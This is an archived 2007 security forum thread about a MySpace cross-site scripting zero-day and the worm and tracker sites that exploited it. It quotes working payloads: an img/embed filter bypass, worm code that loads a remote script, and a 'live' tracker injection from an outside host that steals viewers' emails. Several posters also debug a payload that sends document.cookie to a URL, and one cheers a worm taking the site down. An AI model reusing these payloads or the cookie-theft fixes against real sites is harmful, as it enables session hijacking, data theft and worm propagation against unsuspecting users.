Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Myspace (The Worm)
Posted by: digi7al64
Date: January 10, 2007 05:22PM

<img z='<embed ' srcsrc="http://imaqeshack.us/pix.gif"="http://imaqeshack.us/pix.gif" onsrc="y"load="alert('xss')">

meh i was reading a post here when I realised it was another myspace 0 day (all browsers).

Credit to Prophet for finding it.

As for the actual worm the rendered code is

<embed allowScriptAccess="never" allowNetworking="internal" enableJSURL="false" enableHREF="false" saveEmbedTags="true" ><script language="javascript" src="http://angeliceyz00.cbstaff.com/worm/request.js">function nothingf(){document.write("jajaja.mov.r{}");}</script>

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: Myspace (The Worm)
Posted by: kuza55
Date: January 10, 2007 11:59PM

I don't think Prophet found it, I think he just obtained this vuln from a myspace tracker site. The reason I say this is because if you view the video demo that this site: http://www.profiletracker.us/ has posted on youtube: http://www.youtube.com/watch?v=M3spRkx6aBQ you see that the divs are awfully similar, and the guy does mention that this is somehow related to a myspace tracker.

I could be wrong, but I didn't see him claiming this to be his.....

Options: ReplyQuote
Re: Myspace (The Worm)
Posted by: jungsonn
Date: January 11, 2007 04:21AM

I hope this thing, or another worn is going to flush that site down soon, they're really asking for it. it seems that is the best way to learn for them.

Options: ReplyQuote
Re: Myspace (The Worm)
Posted by: lobas
Date: January 11, 2007 06:02AM

Any see problems with these, im getting data sent when i sniff but no cookie

<body onload.._=document.location='http://localhost:80'+escape(document.cookie).substr(0,1900)">

Options: ReplyQuote
Re: Myspace (The Worm)
Posted by: jungsonn
Date: January 11, 2007 10:48AM

That can't work because of a flaw you made.

Look:

<body onload.._=document.location="http://localhost:80+escape(document.cookie).substr(0,1900)">

Options: ReplyQuote
Re: Myspace (The Worm)
Posted by: maluc
Date: January 11, 2007 11:58AM

escape() is a function:

<body onload.._="document.location='http://localhost:80?'+escape(document.cookie).substr(0,1900)">

so the only change is an initial " before document and a ? after :80 .. the cookie is part of the query not the port

-maluc

Options: ReplyQuote
Re: Myspace (The Worm)
Posted by: rsnake
Date: January 11, 2007 04:15PM

@kuza55 - Forgive me because I actually got rid of my MySpace account a long time ago. How does that tracker actually get the email address? Is that something that is in the query string or referring URL? The image on http://www.imaqeshack.us/superbig.jpg doesn't show the entire referring URL or the current URL (cuts off). If that's how it's getting it, they are charging $5 a month for trivial information.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Myspace (The Worm)
Posted by: Luny
Date: January 11, 2007 04:27PM

interesting.

Myspace needs to stop putting bandaids on bullet wounds.

---------------
Digital footprints suck. Learn to walk on your hands.
http://www.youfucktard.com

Options: ReplyQuote
Re: Myspace (The Worm)
Posted by: bubbles
Date: January 11, 2007 05:01PM

rsnake Wrote:
-------------------------------------------------------
> @kuza55 - Forgive me because I actually got rid of
> my MySpace account a long time ago. How does that
> tracker actually get the email address? Is that
> something that is in the query string or referring
> URL? The image on
> http://www.imaqeshack.us/superbig.jpg doesn't show
> the entire referring URL or the current URL (cuts
> off). If that's how it's getting it, they are
> charging $5 a month for trivial information.

The email address is in the cookie.

-bubbles
http://webmastertutorials.net

Options: ReplyQuote
Re: Myspace (The Worm)
Posted by: rsnake
Date: January 12, 2007 01:14PM

Ah, so the tracker was using XSS to steal the cookie? I missed that... that makes way more sense.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Myspace (The Worm)
Posted by: bubbles
Date: January 12, 2007 03:50PM

Its the only way I know of to track who views your myspace.

-bubbles
http://webmastertutorials.net

Options: ReplyQuote
Re: Myspace (The Worm)
Posted by: rsnake
Date: January 14, 2007 12:42PM

You can track the IP without it, but not the email. That's why I was asking how they got the email.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Myspace (The Worm)
Posted by: Tribute
Date: January 15, 2007 09:02AM

Heres an example (live) tracker:

Myspace code:
<img z='<embed allowScriptAccess="never" allowNetworking="internal" enableJSURL="false" enableHREF="false" saveEmbedTags="true" src="http://pix.gif" ' src="http://stalkertrack.com/pix.gif" onload="var e=document.createElement('script');e.setAttribute('src','http://stalkertrack.com/tracker/sqltrack.js'); document.getElementsByTagName('head')[0].appendChild(e);"/> </style>

Also have a look at the js code:
stalkertrack.com/tracker/sqltrack.js

I didn't paste it as its a tad long.

Options: ReplyQuote
Re: Myspace (The Worm)
Posted by: rsnake
Date: January 15, 2007 04:28PM

haha... Firefox thinks it's a phishing site. What else has been on that server?

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Myspace (The Worm)
Posted by: bubbles
Date: January 15, 2007 07:25PM

They used to carry out mass phishing attacks on myspace. I remember reading bulletins and going to websites like google.com?url=whatevertheblogis.com and they were advertising a tracker back then too, but instead they just stole your password. Now they still advertise the tracker, but Im not even sure they have one.

-bubbles
http://webmastertutorials.net

Options: ReplyQuote
Re: Myspace (The Worm)
Date: January 16, 2007 08:45PM

So this is the worm that's causing myspace phishing, including Tom's hacked profile?

Options: ReplyQuote


Sorry, only registered users may post in this forum.